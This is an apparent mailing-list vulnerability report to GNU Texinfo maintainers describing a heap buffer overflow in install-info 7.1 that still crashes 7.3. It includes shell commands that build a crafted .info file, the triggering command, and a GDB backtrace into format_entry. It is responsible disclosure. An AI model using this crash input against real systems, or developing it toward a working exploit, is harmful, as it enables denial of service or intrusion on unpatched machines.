Hello again, I have an update. I just built GNU Texinfo 7.3 (the latest upstream release) from source and tested it in the same environment.
The crash is still present in version 7.3. On this version, the error manifests as: malloc(): invalid size (unsorted) IOT instruction (core dumped) Best regards, Leenear On Mon, Apr 20, 2026 at 1:08 AM LogicLuminary <[email protected]> wrote: > Dear Texinfo Maintainers, > > I hope you are doing well. I have discovered a heap buffer overflow in the > install-info utility (GNU texinfo 7.1, 2023). > > *Tested Environment:* > > - > > *Version:* install-info (GNU texinfo) 7.1 > - > > *OS:* Ubuntu 24.04.3 LTS > > *Steps to Reproduce: * > > 1) Create a malicious .info file with excessive line-break expansion: > > echo "START-INFO-DIR-ENTRY" > overflow.info > echo -n "* Crash: (crash). " >> overflow.info > for i in {1..100}; do echo "A." >> overflow.info; done > echo "END-INFO-DIR-ENTRY" >> overflow.info > > 2) Run: install-info overflow.info normal.dir > > *Observed Result:* The program crashes with malloc(): corrupted top size > and a SIGABRT. > > *GDB Backtrace (Summary):* > > malloc(): corrupted top size > > Program received signal SIGABRT, Aborted. > Download failed: Invalid argument. Continuing without source file > ./nptl/./nptl/pthread_kill.c. > __pthread_kill_implementation (no_tid=0, signo=6, threadid=<optimized > out>) at ./nptl/pthread_kill.c:44 > warning: 44 ./nptl/pthread_kill.c: No such file or directory > (gdb) bt > #0 __pthread_kill_implementation (no_tid=0, signo=6, threadid=<optimized > out>) at ./nptl/pthread_kill.c:44 > #1 __pthread_kill_internal (signo=6, threadid=<optimized out>) at > ./nptl/pthread_kill.c:78 > #2 __GI___pthread_kill (threadid=<optimized out>, signo=signo@entry=6) > at ./nptl/pthread_kill.c:89 > #3 0x00007ffff7c4527e in __GI_raise (sig=sig@entry=6) at > ../sysdeps/posix/raise.c:26 > #4 0x00007ffff7c288ff in __GI_abort () at ./stdlib/abort.c:79 > #5 0x00007ffff7c297b6 in __libc_message_impl (fmt=fmt@entry=0x7ffff7dce8d7 > "%s\n") > at ../sysdeps/posix/libc_fatal.c:134 > #6 0x00007ffff7ca8ff5 in malloc_printerr (str=str@entry=0x7ffff7dcc6f7 > "malloc(): corrupted top size") > at ./malloc/malloc.c:5775 > #7 0x00007ffff7cac2fc in _int_malloc (av=av@entry=0x7ffff7e03ac0 > <main_arena>, bytes=bytes@entry=1659) > at ./malloc/malloc.c:4447 > #8 0x00007ffff7cad812 in __GI___libc_malloc (bytes=bytes@entry=1659) at > ./malloc/malloc.c:3328 > #9 0x0000555555559438 in xmalloc (s=1659) at ../gnulib/lib/xmalloc.c:43 > #10 format_entry (outstr_len=0x5555555721a0, outstr_out=0x555555572198, > width=<optimized out>, align=35, calign=33, > desc_len=399, > desc=0x555555572340 "A. A. A. A. A. A. A. A. A. A. A. A. > A. A. A. A. A. A. A. A. A. A. A. A. A. A. A. A. A. A. A. > A. A. A. A. A. A. A. A. A. A. A. A. A. A. A. A. A. A. A. > "..., > name_len=17, name=0x555555572320 "* Crash: (crash).") > at /usr/src/texinfo-7.1-3build2/install-info/install-info.c:1446 > #11 reformat_new_entries (maxwidth_cli=<optimized out>, > align_cli=<optimized out>, calign_cli=<optimized out>, > entries=<optimized out>) at > /usr/src/texinfo-7.1-3build2/install-info/install-info.c:1716 > #12 main (argc=<optimized out>, argv=<optimized out>) at > /usr/src/texinfo-7.1-3build2/install-info/install-info.c:2451 > (gdb) > > I would appreciate it if you could confirm this finding. > > Best regards, > Leenear >
